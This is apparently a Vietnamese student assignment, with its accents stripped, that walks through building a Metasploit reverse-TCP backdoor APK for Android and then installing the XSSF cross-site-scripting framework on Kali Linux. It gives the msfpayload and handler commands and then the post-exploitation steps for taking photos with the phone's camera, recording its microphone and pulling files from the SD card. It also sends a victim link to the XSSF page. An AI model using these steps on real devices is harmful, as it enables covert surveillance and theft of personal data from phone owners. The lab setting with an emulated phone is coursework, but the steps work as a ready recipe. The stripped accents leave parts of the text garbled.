Bi tp v nh An ninh mngNi dung: To m c trn Kali Linux xm nhp AndroidNhm 5 :T Th Hng 1120066Nguyn Vn Hong1120058Ng Triu Hun1120060Trng Thnh Lun1120097

1. To lp BackdoorTa vo phn chnh to backdoor v xm nhp iu khin androidu tin m terminal v g dng lnh: msfpayload android/meterpreter/reverse_tcp lhost=192.168.220.128 lport=8080 R > /root/Desktop/app.apk192.168.220.128 l a ch IP ca my Kali, ta c th s dng lnh ifconfig xem IP ca my Kali 8080 l s port, c th chn port khc, khng nn chn cc port thng s dng Lnh trn s to ra 1 file files.apk trn desktop ca Kali, y chnh l mt Metasploit reverse tcp backdoor.Tip theo, g lnh msfconsole

Sau khi msfconsile load xong, ta to mt handler x l d liu truyn v bng cch g lnh sau:use exploit/multi/handlerset payload android/meterpreter/reverse_tcpset lhost 192.168.0.104 nhp a ch IP ging vi khi to payload trn.set lport 8080 nhp port ging vi port khi to payload trn.ExploitMn hnh s nh sau, lc ny ta ang ch mt my android m backdoor.Th vi mt my Google Nexus gi lp, ti v app.apk, ci t v m ln c giao din nh di, nhp vo nt reverse_tcp:

Vy l ta kt ni thnh cng ti my Android ny, msfconsole s nh sau: xem thng tin v my, nhp lnh SysInfo

S dng camera: xem danh sch camera, nhp webcam_list

chp hnh bng camera, nhp webcam_snap x vi x l id ca camera xem danh sch camera phn trc. V d nh sau:

File hnh chp t camera ca my android l FrumITki.jpeg c lu /root ca my

Ghi m thc hin ghi m, nhp lnh record_mic v file ghi m s c lu v my

Ly file t sd card vo sdcard, nhp lnh : cd /sdcard v lnh ls xem danh sch file, th mc

V d y, ta ti file app.apk trong th mc download ca sdcard

Dng lnh cd /sdcard/Download vo th mc

Nh trn hnh, ta thy 1 file l App.apk, ti v my, ta nhp lnh

Download App.apkV file ny s c ti v th mc root ca my Kali

2. XSSF ci t XSSF cho kali s sng 3 cu lnh:msfupdatecd /opt/metasploit/apps/pro/msf3svn export http://xssf.googlecode.com/svn/trunk ./ --force

Tip theo l lnh: xssf_urls

XSSF LOG PAGE : http://192.168.220.128:80/xssf/gui.html?guipage=main

a ch gi cho nn nhn l: http://192.168.220.128:80/xssf/test.html

Kt qu trn terminal:

Lnh xssf_victim dng hin thng tin nn nhn

Lnh xssf_information dng hin thng tin nn nhn chi tit hn

Tip tc lnh search auxiliary/xssf

Refesh li trang web s thy thng tin nn nhn

Tip theo s dng lnh alert cnh bo nn nhn:

HT